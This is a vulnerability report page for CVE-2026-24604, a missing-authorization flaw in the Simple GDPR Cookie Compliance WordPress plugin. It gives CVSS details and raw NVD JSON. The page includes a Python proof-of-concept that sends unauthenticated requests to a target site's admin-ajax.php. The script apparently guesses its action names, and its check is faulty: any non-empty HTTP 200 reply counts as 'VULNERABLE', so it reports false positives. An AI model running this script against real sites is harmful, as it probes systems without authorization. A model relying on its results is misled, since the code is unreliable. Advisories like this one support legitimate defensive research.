Security Vulnerability Report
中文
CVE-2026-24604 CVSS 5.3 MEDIUM

CVE-2026-24604

Published: 2026-01-23 15:16:19
Last Modified: 2026-04-28 15:16:19

Description

Missing Authorization vulnerability in themebeez Simple GDPR Cookie Compliance simple-gdpr-cookie-compliance allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple GDPR Cookie Compliance: from n/a through <= 2.0.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Simple GDPR Cookie Compliance <= 2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24604 PoC - Missing Authorization in Simple GDPR Cookie Compliance # Affected versions: <= 2.0.0 import requests import sys TARGET_URL = "http://target-site.com" def check_vulnerability(): """ Check if the target WordPress site has the vulnerable plugin installed and test for missing authorization on plugin endpoints. """ # Common WordPress AJAX endpoint ajax_endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Plugin-specific AJAX actions that should require authorization vulnerable_actions = [ "simple_gdpr_cookie_compliance_save_settings", "simple_gdpr_cookie_compliance_get_consent", "simple_gdpr_cookie_compliance_update_preferences", "simple_gdpr_cookie_compliance_get_logs" ] print(f"[*] Testing CVE-2026-24604 on {TARGET_URL}") print(f"[*] Target plugin: Simple GDPR Cookie Compliance <= 2.0.0") print(f"[*] Vulnerability: Missing Authorization (Broken Access Control)\n") for action in vulnerable_actions: # Send unauthenticated request to potentially protected endpoint data = { "action": action, "nonce": "", # No nonce provided - testing unauthenticated access } try: response = requests.post(ajax_endpoint, data=data, timeout=10) # Check if request was successful without authentication if response.status_code == 200: # Check for successful response indicating missing auth check if "success" in response.text or len(response.text) > 0: print(f"[!] VULNERABLE: {action}") print(f" Status Code: {response.status_code}") print(f" Response Length: {len(response.text)}") print(f" This endpoint responds without authentication!\n") else: print(f"[+] SAFE: {action} - Endpoint requires authentication\n") else: print(f"[-] {action} - HTTP {response.status_code}\n") except requests.exceptions.RequestException as e: print(f"[!] Error testing {action}: {e}\n") print("[*] PoC completed. Manual verification recommended.") print("[*] Check plugin version and verify unauthorized access to admin functions.") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24604", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:19.110", "lastModified": "2026-04-28T15:16:18.727", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in themebeez Simple GDPR Cookie Compliance simple-gdpr-cookie-compliance allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple GDPR Cookie Compliance: from n/a through <= 2.0.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en themebeez Simple GDPR Cookie Compliance simple-gdpr-cookie-compliance permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Simple GDPR Cookie Compliance: desde n/a hasta &lt;= 2.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/simple-gdpr-cookie-compliance/vulnerability/wordpress-simple-gdpr-cookie-compliance-plugin-2-0-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}